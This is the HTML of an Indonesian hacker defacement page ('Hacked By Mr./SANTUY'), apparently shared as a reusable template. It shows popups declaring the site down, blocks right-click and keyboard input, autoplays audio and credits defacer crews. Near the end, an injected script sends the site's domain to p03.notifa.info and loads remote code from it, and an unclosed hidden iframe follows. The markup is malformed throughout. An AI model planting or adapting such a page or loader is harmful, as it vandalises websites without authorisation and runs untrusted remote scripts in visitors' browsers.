<!--BANTU SUPORT IG @AKKU_SANTUY CUK-->
<!--NGAMBIL SCRIPT DEFACE TAPI GK FOLLOW :(-->
<DOCYPE html> 
<head> 
	
<script>
alert("Assalamualaikum?");
alert("Your Website Down");
 alert("Hey namaku Mr./SANTUY !!"); var nama; nama=prompt('siapa nama kamu?'); if(nama){ alert('Hallo '+nama+'! Mau Berteman Denganku?'); }else{ alert('Ye kok sombong ga mau kenalan'); }
 alert(" DEAR BROTHER : TETAPLAH BERBUAT BAIK WALAUPUN ORANG LAIN TIDAK PERNAH BERBUAT BAIK PADAMU");
 alert("From SANTRI CYBER SANTUY X JAWA TENGAH X-PLOIT");
</script>
	
    <link rel="icon" type="image/jpg" href="https://i.ibb.co/4TnjQL0/196276265-514525136398257-1761107452814676308-n.jpg">
<meta property="og:image" content="https://i.ibb.co/4TnjQL0/196276265-514525136398257-1761107452814676308-n.jpg"/>
<link rel="shortcut icon" href="https://i.ibb.co/4TnjQL0/196276265-514525136398257-1761107452814676308-n.jpg"/>
     <meta name="description" content="Pwned By Mr./SANTUY">
      <meta name="keywords" content="JEPARA X-PLOIT"> 
      <meta http-equiv="cache-control" content="index,cache">
       <meta http-equiv="pragma" content="index,cache">
        <title>Hacked By Mr./SANTUY Was Here</title>         
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
<meta charset="utf-8">
<meta name="description" og:content="SANTRI CYBER SANTUY">
<meta name="og:description" content="JAWA TENGAH X-PLOIT">
<meta property="og:image" content="https://i.ibb.co/4TnjQL0/196276265-514525136398257-1761107452814676308-n.jpg">
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<style> html,
 body { color: #FFFFFF; font-family: 'Kelly Slab', sans-serif; font-weight: 60; height: 60vh; margin: 0; }
.full-height { height: 67vh; }
.flex-center { align-items: center; display: flex; justify-content: center; }
.position-ref { position: relative; }
.content { text-align: center; }
.title{ font-size: 36px; padding: 20px; }
	input {
		background: transparent;
		color: black;
		border: 1px solid black;
	}
	input:hover{
		color: black;
	}
</style> 
<style type=text/css >
.blink_text {
-webkit-animation-name: blinker;
-webkit-animation-duration: 2s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 2s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 2s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;

 color: red;
}
@-moz-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@-webkit-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
 
 #copy {
 	color: lime;
 	font-weight: bold;
 	font-family: Kelly Slab;
 }
 #copy a {
 	color: white;
 }
 #copy a:hover {
 	color: blue;
 }

body{
font-family: Kelly Slab;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: #15CFF4;
}
table{
border: 1px #000000;
}
.s_tb{
border:1px silver;
}
a{
color:white;
font-size: 19px;
text-decoration:none;
}
a:hover{
color:green;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 2px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
h2{
font-family:Kelly Slab;
font-size:25px;
color:white;
}
h3{
font-size:35px;
}
h4{
font-size:15px;
font-family:Kelly Slab;
color:white;
}
</style>

<center>
<body align="center" oncontextmenu="return false" bgcolor="black">
<div class="stars"><div class="twinkling">
<div class="flex-center position-ref full-height"> <div class="content"> 
<div class="text">
<font color="white"> 
<img title="MR./SANTUY Images" src="https://i.ibb.co/4TnjQL0/196276265-514525136398257-1761107452814676308-n.jpg" width="420" height="420"><br><i>
<p class="blink_text"style="font-size:55px;color: green;text-shadow: 0px 0px 0px white , 0px 0px 0px white;font-family:Kelly Slab;">Pwned By Mr./SANTUY X-Ploit
<style =font-size;45px;color: orange;text-shadow: 0px 0px 29px white , 0px 0px 29px white;> <br></style></p>
<font size="8"font color="white"> Mengapa harus<font color="red"> mencintai<font color="white"> apabila kita tahu kehilangan itu menyakitkan,<font color="cyan"> sebab kita tahu<font color="white"> kita tidak mampu hidup <font size="8"font color="yellow">Sendiri :V<br><br>
<font size="3"font color="white"> Mr.Tod - Mr.Nickname-07 -<font size="3" color="red"> Mr.SANTUY <font color="white">- Mr.Badut - Mr.Haan - Tohid - <br>Mr.EdoX - Mr.L4M3R - Mr.Zamirul - Mr.stars - Mr.Gery - Rifky </i><br><br><br>
<font size="2" color="cyan">[!] JAWA TENGAH X-PLOIT<font color="red"> - INDONESIAN DEFACER TERSAKITI - SANTRI CYBER TEAM - SABUN MANDI CYBER - BROTHER TERSAKITI [!]<br>

<br>
</font><a href="https://www.instagram.com/akku_santuy/"><font face="courier new" size="3" font style="text-shadow: 0px 0px 30px red;" color="yellow">[!] SUPORT ME [!]<br></a></font>
<br>
<center><audio autoplay="autoplay" controls="controls" src="https://d.top4top.io/m_1995alrbg1.mp3">
</audio>
</center>
</body>
</html>
	<br><br>
	</font><a href="https://api.whatsapp.com/send?phone=+6282134566596&text=Assalamualaikum:)"><font face="courier new" size="3" font style="text-shadow: 0px 0px 30px red;" color="white">Copyright © Mr./SANTUY 2021<br></a></font>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX2Jt0jmrdO%2fNxhbNbnP8PtuR9VzDKoIbxRsZJf%2bwYanYZ0vnYEkjdD%2bCFVb%2fwrHGPa6wXjMg7zSe3CB4%2fgc1GVhl%2fIBaXnLHzanHf2yurBw9Uy%2fJaBguleyMC2VrPVzzKqQp9vr6IzMvQHrEmI8TajHchNpa6UZcazPiFe90xiESHq4OP%2b1T9DXle4oEztNjzDiP1Jb%2bTqW85inLU5L2RD%2b24RZqEEAA5CVGGB%2b8wg6j9tK%2frg8PwztWwbLR3CAuG%2bp%2fQWLX%2fST%2fiF%2b624B62eulM5dqteN1McWdoyyh6up%2b316iT0GbImZiA2XNc%2bIf4lyCXm%2bsDUZggByMMXfyxdmVCMK3XTKVnwt4Ab0IFHXau%2birz%2bi0mxRtL1OrZOJhYf%2bw6XxQnoOC3RKwPGVgSkJcC4%2bcE2bWNGBFytiCSFFTyVOdrMzw7RUvVnPkqu26ykV%2bUTjAauCKP1xpB7ddcn7stXDRNvHLP6sM6zmyAkkS8OeYDTW%2bLHTDaILb0eebuolDbHl04P8plF4NQU%2bDK2xyumzxQhUrv%2fs36uA9n5AA%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
<iframe width="0" height="0" 
</font>
</font>
</font>
</font>
</font>
</font>
</font>
</font>
</i>
</font>
</div>
</div>
</div>
</div>
</div>
</body>
</center>
</body>
</head>
</html>
   
